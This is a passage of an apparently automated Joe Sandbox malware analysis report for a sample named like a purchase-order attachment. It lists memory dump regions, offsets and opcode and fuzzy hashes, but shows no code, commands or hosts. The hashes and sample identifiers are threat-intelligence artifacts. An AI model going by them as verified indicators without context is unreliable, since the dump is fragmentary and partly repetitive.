                                                          • Instruction ID: 96516172c6214a36470d26c41e48c92e0a46fce4bc4f138ea1d5a6a8f1b3c026
                                                          • Opcode Fuzzy Hash: 07425601d75a6e0451ce4f074d6714dcf8a00f0474330c640d6edb67338441d5
                                                          • Instruction Fuzzy Hash: 21018631304740CFEB2567B09C257693B7AEBC5326F1584EDD5195B2D0DF66E801C692
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ca1d96ff66279db8c1061d0da6cdc902e3196b237f20c789fd9a0d7a76d1e47
                                                          • Instruction ID: 509a10fd30c566e6bab187a2bedee8deb57b58e5e181da99ddb47a9a34d66f17
                                                          • Opcode Fuzzy Hash: 1ca1d96ff66279db8c1061d0da6cdc902e3196b237f20c789fd9a0d7a76d1e47
                                                          • Instruction Fuzzy Hash: 0C115A70E04208CBDB08DF69D8447EEBBB6FB89350F00C0A5E449A7245CFB42988CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f23e5319478a1ce41b54c6ce3b6895e9732e8faca40849fb3e94f43bdbc4e1c
                                                          • Instruction ID: 1d04748d18717b02597e816f0c563ce830b4adea63c92efcc32c8cb31ba61fd8
                                                          • Opcode Fuzzy Hash: 8f23e5319478a1ce41b54c6ce3b6895e9732e8faca40849fb3e94f43bdbc4e1c
                                                          • Instruction Fuzzy Hash: 8021B774A042288FDB65DF24D848B9AB7F5FF49305F5050D9E44AA7291DB746E80CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74198c99a55ca3dc078a5b3795ecd78bb1600354515f73e3c225ddef76741211
                                                          • Instruction ID: 50b28cabe825875068c56ffb38401969042fb7b02c325ee03e5ea348933f7f91
                                                          • Opcode Fuzzy Hash: 74198c99a55ca3dc078a5b3795ecd78bb1600354515f73e3c225ddef76741211
                                                          • Instruction Fuzzy Hash: 16014871D04208DFCB05DFA8D8497BDBBF4FB08305F2488AAD809E3250DB759A41CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 771fc2de2936d72f75076f6426c4a609df42ad52fc465937e55ff9591fda1b01
                                                          • Instruction ID: 8c13e5bf371d0ebfe848dbb7258bac1918d7b3a7254b5e38bd0adcf8fe99f9c7
                                                          • Opcode Fuzzy Hash: 771fc2de2936d72f75076f6426c4a609df42ad52fc465937e55ff9591fda1b01
                                                          • Instruction Fuzzy Hash: C9019235700600CFDB19DB24C468B3A7BB6AFC9325F14859CD55A4B790CB79E842D781
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 471ff3957e4dfb9ff3fc48d7b5d9f6255cb527f97d7c19f8cce20bcd76e88f66
                                                          • Instruction ID: 88c9856a8bc7592cf6c997927b19ba624186ecbc332b003116d307699f1a9459
                                                          • Opcode Fuzzy Hash: 471ff3957e4dfb9ff3fc48d7b5d9f6255cb527f97d7c19f8cce20bcd76e88f66
                                                          • Instruction Fuzzy Hash: B601B1317006008FCB28EB24C464A3E7BA7AFC9321F1485ACD55A4B790CB79EC42D781
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32630d0b091f94aac0cee962f5a31ea17dd8b09dadc5cf3ac1a07ca4b9ac5ec3
                                                          • Instruction ID: 6cacd29e6cff2f23525dd0262ced57980de329a22ed2c90ccab8ad263dae5220
                                                          • Opcode Fuzzy Hash: 32630d0b091f94aac0cee962f5a31ea17dd8b09dadc5cf3ac1a07ca4b9ac5ec3
                                                          • Instruction Fuzzy Hash: 3F018F367006149FC7089B24E458A2EBBA2EFC8711B108169E90A8B394CF35EC42CBC5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c93dbf686db565b223018da12f71905792640f12b634d8b0a8611d67629d11f5
                                                          • Instruction ID: 49e7555bb07e4013d2527b7215a4588aea90ab8e6114e6a3c4554f4c0a7c53d6
                                                          • Opcode Fuzzy Hash: c93dbf686db565b223018da12f71905792640f12b634d8b0a8611d67629d11f5
                                                          • Instruction Fuzzy Hash: 40018F70905208DBCB51DBB8D0487ADBBF5EB44210F1086EAD848A7351D7799E41DF92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5df042690b18ac74f07c6a4bbca81288d4bdf3f0edd32368cff82b20a517a614
                                                          • Instruction ID: bc14f333dff5100731bec56c8da3dc31dd7698522fb1ef730a2c37d973b178fc
                                                          • Opcode Fuzzy Hash: 5df042690b18ac74f07c6a4bbca81288d4bdf3f0edd32368cff82b20a517a614
                                                          • Instruction Fuzzy Hash: 8301F9353046418FC7049F59EC84E9A7BB9FFDA32171580A6F514D73A1CE20DC05C791
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fd60c040dcc609434f213302c588d33e133fceb0a931b7fcc8d638f119b5505
                                                          • Instruction ID: cb8e3d73f83b8b43e1b78d360e5a9e6001ddb9d3a8d72eaacf88738da4a62036
                                                          • Opcode Fuzzy Hash: 2fd60c040dcc609434f213302c588d33e133fceb0a931b7fcc8d638f119b5505
                                                          • Instruction Fuzzy Hash: 4501FBB5B102108FCB44BB7DD85895D3BF6AFCC66131904A4E60ACB371DF64DC059B90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e96a843630ea2c7daf8b8391b80598c2f6f525a66a713e277f0ced20858eea69
                                                          • Instruction ID: bf9c1c8fe02b075fd29776119d7aa345c75d8ab4d6e1f33ff0adaddf4d29e9b4
                                                          • Opcode Fuzzy Hash: e96a843630ea2c7daf8b8391b80598c2f6f525a66a713e277f0ced20858eea69
                                                          • Instruction Fuzzy Hash: 5001083AF00248CFDB18DF99E4806DCB7B2EB88325F28C166C515A3309D73199558B20
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3822aaa08e0a202b93760892c612da6c652e484f7abadf7b8a4325e6e7df276
                                                          • Instruction ID: 02928f51f3c5fb9f16ea61ab3bda2a01ebb085bf9bb7e09a8bcd693d3fc34406
                                                          • Opcode Fuzzy Hash: e3822aaa08e0a202b93760892c612da6c652e484f7abadf7b8a4325e6e7df276
                                                          • Instruction Fuzzy Hash: AE01E53AB04208CBDB08DF99E4806DDF7F2FB88325F288166C509A3619D73599558B60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0b7eb0e7e9856fc324cdf8002800b7a108e1053e015b851c0ac730681d51d04
                                                          • Instruction ID: dbc824d1cb7f6f705422991f92a850bc4f0672981e6f0f21ca51becb975b1d1d
                                                          • Opcode Fuzzy Hash: f0b7eb0e7e9856fc324cdf8002800b7a108e1053e015b851c0ac730681d51d04
                                                          • Instruction Fuzzy Hash: FD0181B5B142505FCB44AB7C941895E3BE69FC925131904AAE50ADB3A2DF34CC0687A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e05b37690f478fd2158e924af187de546140800600a8e431b9b3d06efeb3a518
                                                          • Instruction ID: ad85107efde2eabf8a45be512d290e26c165fe51fdbb8b5984e6e881764d4b51
                                                          • Opcode Fuzzy Hash: e05b37690f478fd2158e924af187de546140800600a8e431b9b3d06efeb3a518
                                                          • Instruction Fuzzy Hash: D5F0E9FB40A3C05FE7160370ED527E87F219B53302F4D8097D54085353D62D4416C362
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c326e198ffa5a2e86727f26ce33d4b8466ef646d6e3f04ea8e0e497e74989ead
                                                          • Instruction ID: 14c84b1d5f47de906029cd3bb2031b6dda5ebf105d61ba3d39ae46f6d5c8b150
                                                          • Opcode Fuzzy Hash: c326e198ffa5a2e86727f26ce33d4b8466ef646d6e3f04ea8e0e497e74989ead
                                                          • Instruction Fuzzy Hash: 05016D7AF00608CFDB04EFA9F48069DB7B2EB88325F24C176D109D7369DB3099558B11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 241ff30c5ed2814c98c169dfa46d6eeece2bf7577c5710394c911b1dee7cc5ef
                                                          • Instruction ID: 04c02311217959d5a74e40aa2e59a10f5399981989219dfeef8e1d353066afed
                                                          • Opcode Fuzzy Hash: 241ff30c5ed2814c98c169dfa46d6eeece2bf7577c5710394c911b1dee7cc5ef
                                                          • Instruction Fuzzy Hash: EB01283AF04648CFDB14DFA9F480AEDB3B2FB88315F24C026D408A3609D734A9569F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d320f942e43fbc519dc3dbc052e9ff252d738677c2514a8adf9a38670da6acd
                                                          • Instruction ID: 4395b2dc06d746fb020f744fa877f2cd60579dd9304a0b941aad455834caa939
                                                          • Opcode Fuzzy Hash: 9d320f942e43fbc519dc3dbc052e9ff252d738677c2514a8adf9a38670da6acd
                                                          • Instruction Fuzzy Hash: DB01163AE04108CFDB14DF98F484A9DF7B2EB84325F28C166D518A721ADB34A956CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fcb14845caeaa14fba19a4267fd0acf722b7012935ff30925ba3f51127efdf9
                                                          • Instruction ID: e296bffed39f09a00cceadf5236b56fe641c43c3d734f356521b38d43811d98a
                                                          • Opcode Fuzzy Hash: 2fcb14845caeaa14fba19a4267fd0acf722b7012935ff30925ba3f51127efdf9
                                                          • Instruction Fuzzy Hash: 1C0131B66042099FD718CEA8D444FAAFBF5FB44370F5480A9E945DB250D731A980CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 275bea255a07d6388b4786c9307da54e39fc8f9fa221d2e2511a5f96d3062a2e
                                                          • Instruction ID: bf889c647279caff68b2ee517253d75a11e1384ceca70f1227bc2bea807a3417
                                                          • Opcode Fuzzy Hash: 275bea255a07d6388b4786c9307da54e39fc8f9fa221d2e2511a5f96d3062a2e
                                                          • Instruction Fuzzy Hash: A201AF353006149FC709DB24E05892EBBA2EFCD721B208169E90A8B794CF75FC42CBC5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4393106e49cb2449552db4d7249d9b4ecfa7e7d09929232b6ab0c99574f85ec3
                                                          • Instruction ID: a3c90904d9650097728317755310ee26c94f5475df7422ed820ac3c41d8b428d
                                                          • Opcode Fuzzy Hash: 4393106e49cb2449552db4d7249d9b4ecfa7e7d09929232b6ab0c99574f85ec3
                                                          • Instruction Fuzzy Hash: 7EF04CB2F083515FD7098618581072EBBB4EFC9720F1481A6D905EB3A1DB71BC018390
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 98454101e70cb9bed0e62838ff90a9c0b31894b85250a111f3fbf998165d2a3a
                                                          • Instruction ID: 274e3eeeb2058141ec19573fd41ea8cd7101cba452406205af35dcc37f7febf8
                                                          • Opcode Fuzzy Hash: 98454101e70cb9bed0e62838ff90a9c0b31894b85250a111f3fbf998165d2a3a
                                                          • Instruction Fuzzy Hash: B7F05E36B04648CBDB24DFA8F4805EDF3B2FB84325F24C563C51993619E730951A9F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c39c248ef33ccbe5f8f16e8d9d55674b3c0753e228b1c5b7c3722e5fc82377f6
                                                          • Instruction ID: 695ae48149e394b44d27811366174517559fb537e5f43c905b7898f26bec0155
                                                          • Opcode Fuzzy Hash: c39c248ef33ccbe5f8f16e8d9d55674b3c0753e228b1c5b7c3722e5fc82377f6
                                                          • Instruction Fuzzy Hash: 2EF03A35310200DFC7049B29E454E3A77AAFFC8721B1441A9FA468B3B0CA31EC42CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 816287d61b5c7de3e6d5bd282af1255584e08dc282891e9d0965cd2606ad4772
                                                          • Instruction ID: 3766ed4f263bb04a72ac2b4dc5bc711218b1c83b1a57d957110c1a60b8382bca
                                                          • Opcode Fuzzy Hash: 816287d61b5c7de3e6d5bd282af1255584e08dc282891e9d0965cd2606ad4772
                                                          • Instruction Fuzzy Hash: 8CF017B5D05208EFCB40DFA8D545AADBBF4FB08204F1090EAE808A3351E6359E01CF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95ac3d226b9554b794b09dbcb87eac56a25bec5ed575e83a5a9b7514670ce51e
                                                          • Instruction ID: 0bd4443d48a5d9abb7257947da3c94dace2e82ff510a13bed2e2ed21bf97c8a5
                                                          • Opcode Fuzzy Hash: 95ac3d226b9554b794b09dbcb87eac56a25bec5ed575e83a5a9b7514670ce51e
                                                          • Instruction Fuzzy Hash: 0EF0E731C0060AEBCF01EF99D8419EEBB75FF89320F00C51AE95827211D772A5A6DFA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4c44f8a98daddb66efc13c0e01f6a264f2e112adc657cb37093d2a2891e4ce5
                                                          • Instruction ID: adbacebcd39b849d11d2ebc8ea1c88c5629f1cf011bca44507503c45e92d949c
                                                          • Opcode Fuzzy Hash: b4c44f8a98daddb66efc13c0e01f6a264f2e112adc657cb37093d2a2891e4ce5
                                                          • Instruction Fuzzy Hash: 58F0A070D592449FC701DFB8D6547AD3FB0DB05215F2140EAC84597291DAB01A44CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e1ec79810ea4cc7f21f7712db4b64a80a821ada91927f85e94506f335228bca
                                                          • Instruction ID: 26cbe0768a3745fba5b7db089e8a5aadd78bf2950458419d76c8612207987e69
                                                          • Opcode Fuzzy Hash: 5e1ec79810ea4cc7f21f7712db4b64a80a821ada91927f85e94506f335228bca
                                                          • Instruction Fuzzy Hash: E3010874A05258CFDB64DF58C888AD9B7B5FB88314F0081D9D44DA3715EB749E80CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c610591b4eddce524f0e0f00ba56113fff1ef3251962345728c040dfbaf90645
                                                          • Instruction ID: 1ccd002ac132469707599b7edf09027f47592c665ccf9c33ab162c4fb8e8cbb7
                                                          • Opcode Fuzzy Hash: c610591b4eddce524f0e0f00ba56113fff1ef3251962345728c040dfbaf90645
                                                          • Instruction Fuzzy Hash: CCF0E572A042408FEB10874DAC857E633B3B7A5326F6D81B6E10587691D7B448E38714
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d1cbe1489e8d548863686882eaab9e8f77f3c5c0bfaf30a764adc0b874ab520
                                                          • Instruction ID: a43c7f5b4255c166e0ad8546ecc16c1c8aa0c23fe2135b4279d14aec8630d94c
                                                          • Opcode Fuzzy Hash: 3d1cbe1489e8d548863686882eaab9e8f77f3c5c0bfaf30a764adc0b874ab520
                                                          • Instruction Fuzzy Hash: E7F03034300311CBEB296A7088257293A6AAF86626F1584ADE5169F2D0DF76E8418782
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 042b122a89fc1cb583b023795b72a3ac6bc3397ebe58eb8dd327ca588dbee974
                                                          • Instruction ID: c9f20cbf342d1a0f5acaf8b0a5dc79244566f897669a3ae6199406e1a47a3e9a
                                                          • Opcode Fuzzy Hash: 042b122a89fc1cb583b023795b72a3ac6bc3397ebe58eb8dd327ca588dbee974
                                                          • Instruction Fuzzy Hash: 16F05470549188AFCB41CB98C910AADBFB5EB0A311F14C0DAE86C93252C6359F12DB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93ac8aff95e880b6da693417e4fe3f510482763a0a64b06bf4409eadb2c4d839
                                                          • Instruction ID: d859e96344fa5b456abe3bec28d2e932f77458259553165fea35de649af8ed48
                                                          • Opcode Fuzzy Hash: 93ac8aff95e880b6da693417e4fe3f510482763a0a64b06bf4409eadb2c4d839
                                                          • Instruction Fuzzy Hash: ADF0E5713043059BC7159A2AECC484BFFAADFD83107009A3EF10A8B266DE70AD45C7E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9258fe8014d79581918ce9289260d03550c97f23e001caa31541c359c180cfa
                                                          • Instruction ID: f4d4b33e985d904bb10a87690e90d6125b6ab5bc92046e1467999c601eaac056
                                                          • Opcode Fuzzy Hash: f9258fe8014d79581918ce9289260d03550c97f23e001caa31541c359c180cfa
                                                          • Instruction Fuzzy Hash: B4E0682330F12107C322081C7C9462789AEEBC5B10B5404BFFC49CF340F544CC0143A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2e58b476db4bde632c6b56aed7f686f4f9fd5279f9904a8af79c20ed652b7a6
                                                          • Instruction ID: bfcc414c6afdfa11a39f171def63dc0bf001553698e32ce2017f294c89c3b4eb
                                                          • Opcode Fuzzy Hash: b2e58b476db4bde632c6b56aed7f686f4f9fd5279f9904a8af79c20ed652b7a6
                                                          • Instruction Fuzzy Hash: 14F05E71E04614AFCB19DFA4D4497DD7FB2EB85220F048096E406972D1DB741B86CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6087343face0eda0860df71fc76e3bf927db75f7c62d20a8e28a8ac47d7d5f6
                                                          • Instruction ID: 801175747c5267cd084085d8fe8881339f5777b4b44d037819380bc619472457
                                                          • Opcode Fuzzy Hash: f6087343face0eda0860df71fc76e3bf927db75f7c62d20a8e28a8ac47d7d5f6
                                                          • Instruction Fuzzy Hash: 5C011670A11248CFEB58DF18D498B9DBBF1FB88354F148195E848A7354CB74AD81CF52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19e3b4f8720f4de3f6640a6a302fc28bb1d0d73da8451e0b3e23dd032ebaeec7
                                                          • Instruction ID: 47055ccbcfe660dc064bc4726c2ad0c6c8b4015a3318ae696274cf2cc6b156a9
